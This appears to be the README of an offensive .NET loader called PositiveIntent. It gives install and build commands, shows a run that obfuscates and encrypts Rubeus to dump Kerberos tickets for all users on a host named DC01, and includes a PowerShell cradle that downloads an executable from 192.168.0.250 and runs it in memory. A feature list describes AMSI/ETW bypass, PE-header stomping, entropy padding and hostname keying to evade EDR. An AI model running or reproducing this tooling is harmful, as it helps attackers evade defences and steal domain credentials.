docker pull mono:latest
pipx install git+https://github.com/Mister-Joe/PositiveIntent.git
pi_build --file .\Rubeus.exe --hostname DC01 --args 'dump /nowrap' --writetofile
[+] Updated loader source files
[+] Obfuscated Rubeus.exe
[+] Encrypted and embedded Rubeus.exe as a resource file
[*] Your decryption key is NnoKbpoDocyyXhJQ
[*] Building loader...please hold.
[+] Obfuscated loader
[+] Adjusted entropy of loader to: 5.5
[+] Loader compiled to strudel_patroller.exe
pi_decrypt --file .\log.txt --key NnoKbpoDocyyXhJQ
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
Action: Dump Kerberos Ticket Data (All Users)
...snip...
Tip
You may or may not want to do this depending on the environment and EDR you're up against. Ideal usage is connecting over RDP, right click on loader -> run as administrator -> copy the log file off and decrypt.
$bytes = (Invoke-WebRequest -Uri 'http://192.168.0.250/trap_hospitality.exe' -UseBasicParsing).Content
$assembly = [System.Reflection.Assembly]::Load($bytes)
$entrypoint = $assembly.EntryPoint; [string[]]$arguments = '<your args here if not using --args>'.Split(' ')
[System.Environment]::CurrentDirectory = (Get-Location).Path
$entrypoint.Invoke($null, @(,$arguments))
- AMSI and ETW bypassed via hardware breakpoints using the VEH² technique. No usage of SetThreadContext. No memory patching.
- Obfuscation pipeline built with Mono.Cecil obfuscates both your input assembly as well as the loader.
- PE headers of your assembly (after it's been decrypted and loaded by the CLR) are stomped to hide it from memory page scanners looking for implanted PE signatures.
- Your assembly of choice (Rubeus etc.) is embedded in the loader in chunks as resource files and RC4 encrypted. Reconstructed on runtime.
- Optional flag to redirect output to an encrypted file. Useful to avoid outputting signatured text to console (e.g. tool logos).
- Optional flag to hardcode arguments to be passed to your assembly. Useful to avoid passing signatured arguments on the command line.
- No suspicious usage of crypto libraries - RC4 encryption/decryption is performed using a "raw" implementation of the RC4 algorithm (thanks ChatGPT).
- No P/Invoke usage. D/Invoke only.
- Copyright free English books are embedded as resource files in the loader to keep Shannon entropy between 4.50-5.50.
- Hostname keying.
- Built with .NET Framework 4.5.1 and C# 7.3 for compatibility with various Windows versions.
CrowdStrike Researchers Investigate the Threat of Patchless AMSI Bypass Attacks
Anatomy of a .NET Assembly – The DOS Stub
A Dive Into the PE File Format
Hiding your .NET - ETW
Hardware Breakpoints and Structured/Vectored Exception Handling
Meterpreter vs Modern EDR(s)
Red Team Tradecraft: Loading Encrypted C# Assemblies In Memory
Building, Modifying, and Packing with Azure DevOps
Announcing the .NET Framework 4.8
Understanding ETW Patching
Claude